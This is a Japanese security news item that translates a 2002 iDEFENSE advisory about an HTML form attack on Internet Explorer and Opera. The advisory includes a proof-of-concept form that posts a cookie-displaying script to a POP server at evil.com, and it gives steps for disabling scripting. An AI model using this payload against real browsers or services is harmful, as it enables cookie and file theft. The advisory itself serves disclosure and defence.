複数のウェブブラウザがHTMLフォーム攻撃に対して脆弱〜Multiple Web Browsers Contain HTML Form Attack Flaw〜 | ScanNetSecurity
2024.05.06(月)

複数のウェブブラウザがHTMLフォーム攻撃に対して脆弱〜Multiple Web Browsers Contain HTML Form Attack Flaw〜

◆概要:
 悪意のあるスクリプトをブラウザ上で実行するために、HTTPではないプロトコルを実行しているサーバに、HTMLフォームの内容を送信する攻撃に対して、複数のウェブブラウザに脆弱性が存在している。

国際 海外情報
◆概要:
 悪意のあるスクリプトをブラウザ上で実行するために、HTTPではないプロトコルを実行しているサーバに、HTMLフォームの内容を送信する攻撃に対して、複数のウェブブラウザに脆弱性が存在している。

 攻撃は、ファイルやローカルファイルシステムに保存されているクッキーの内容を表示するなど、CSS(client side scripting)言語が可能なことをすべて実行できるとされている。例えば、下記コードは、拡張HTMLフォームを利用した攻撃を使って、クッキーの内容を表示するHTMLフォームである。

<form name="evil_form" method="post" action=" http://evil.com:110/ "enctype="multipart/form-data">
<textarea name="eostest"> user <script>alert(document.cookie)</script>quit </textarea><input type="submit" value="Submit"></form>

 上記の「action」属性は、フォーム入力が送信される場所を指定している。フォームの入力は、通常は入力を処理するウェブサーバーのCGIスクリプトに送られる。しかし上記の例では、入力がevil.comのPOPメールサーバー(TCPポート110)に送られるようになっている。

 POPなどの非HTTPサービスには、提出された要求の内容をエコーバックするものがある。この場合、ウェブブラウザはエコーされた内容を解釈しようとする。全エラーメッセージはテキストとして解釈されるが、アクティブスクリプト機能が使用可能になっていると、< SCRIPT > < / script >タグ間の内容がJavaScriptとして解釈される。この例では、evil.comドメインのクッキーの内容を示すポップアップウィンドウが表示される。

◆情報ソース:
・Eye On Security
http://eyeonsecurity.net/papers/Extended-HTML-Form-Attack-doc.zip ), Jan.26, 2002
・BugTraq (Obscure, obscure@eyeonsecurity.net ),
Feb. 06, 2002・iDEFENSE 研究所 Feb. 12, 2002

◆分析:
(iDEFENSE 米国)この攻撃は、ローカルファイルやクッキーの内容を攻撃者に転送するために使用される可能性がある。

 上記の例で JavaScriptが送信されるためには、まず被害者にフォームの「提出」(submit)ボタンをクリックさせる必要があるが、より高度なスクリプト機能を使えば、ページを表示するだけでコードの提出が自動的に実行されるようにすることができる。ハンドル名「Obscure」を使っているある人物が、本件に関するに自動化されたPOC(Proof of Concept)を、http://eyeonsecurity.net/advisories/showMyCookie.html で公開している。

◆検知方法:
 マイクロソフト社のInternet Explorer 6.0およびそれ以前のバージョンおよびOpera Software ASA社のOpera 6.0およびそれ以前のバージョンに脆弱性があると報告されている。

◆リカバリー方法:
 アクティブスクリプト機能を無効にすると、この問題を防止できる。InternetExplorerでアクティブスクリプト機能を無効にするには、次の手順に従う。(翻訳者注釈: IEでのアクティブスクリプト解除手順は英語版と日本語版で違うため、ここでは具体的手順は翻訳せず、原文のまま残しておりますのでご了承願います)

1. Select the menu choice Tools then Internet Options.
2. Select the Security tab.
3. Highlight the Internet zone and click the Custom Level button.
4. Scroll down in the list to the Scripting heading and choose
"Disable" for the Active scripting subheading.
5. Confirm the selection by clicking the OK buttons twice.

OperaでJavaScriptを無効にするには、次の手順に従う。

1. [ファイル] の [初期設定] を選択するか、Alt+Pを押す。
2. [マルチメディア]を選択する。
3. [JavaScript]にある[JavaScriptを有効にする]の選択を解除する。

 ただし、「アクティブスクリプト機能」を無効にすると、この機能に依存しているウェブページが、作成者が意図したように表示されない場合がある。
◆ベンダー情報:
 ベンダーのパッチはこのレポートの作成時点では発表されていない。Obscureによると、マイクロソフト社とオペラソフトウェア社は、この脆弱性について報告を受け、現在パッチの作成を行っているようである。マイクロソフト社は、この問題のパッチをリリースする予定である。また、オペラ社はOperaブラウザの次のリリースに本件に関するパッチを組み込む予定である。

※この情報はアイ・ディフェンス・ジャパン
 ( http://www.idefense.co.jp/ )より提供いただいております。
 情報の内容は以下の時点におけるものです。
 【17:01 GMT、02、12、2002】

《ScanNetSecurity》

PageTop

アクセスランキング

  1. ランサムウェア被害の原因はスターティア社の UTM テストアカウント削除忘れ

    ランサムウェア被害の原因はスターティア社の UTM テストアカウント削除忘れ

  2. クラウド労務管理「WelcomeHR」の個人データ閲覧可能な状態に、契約終了後も個人情報保存

    クラウド労務管理「WelcomeHR」の個人データ閲覧可能な状態に、契約終了後も個人情報保存

  3. モリサワ他と損害賠償金4,500万円支払で調停成立~フォント不正コピーの印刷会社

    モリサワ他と損害賠償金4,500万円支払で調停成立~フォント不正コピーの印刷会社

  4. 山田製作所にランサムウェア攻撃、「LockBit」が展開され複数のサーバのデータが暗号化

    山田製作所にランサムウェア攻撃、「LockBit」が展開され複数のサーバのデータが暗号化

  5. 信和へのランサムウェア攻撃で窃取された情報、ロックビット摘発を受けてリークサイトが閉鎖

    信和へのランサムウェア攻撃で窃取された情報、ロックビット摘発を受けてリークサイトが閉鎖

  6. サイバーセキュリティ版「天国と地獄」~ サプライヤーへサイバー攻撃、身代金支払いを本体へ請求

    サイバーセキュリティ版「天国と地獄」~ サプライヤーへサイバー攻撃、身代金支払いを本体へ請求

  7. 今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

    今日もどこかで情報漏えい 第23回「2024年3月の情報漏えい」なめるなという決意 ここまでやるという矜恃

  8. 「シャドーアクセスとは?」CSAJ が定義と課題をまとめた日本語翻訳資料公開

    「シャドーアクセスとは?」CSAJ が定義と課題をまとめた日本語翻訳資料公開

  9. PlayStation公式になりすましたアカウントに注意喚起、個人情報要求DMも

    PlayStation公式になりすましたアカウントに注意喚起、個人情報要求DMも

  10. インターネット専用宝くじで当選本数の登録誤り、1 等 200 万円 10 本が 200 本に

    インターネット専用宝くじで当選本数の登録誤り、1 等 200 万円 10 本が 200 本に

ランキングをもっと見る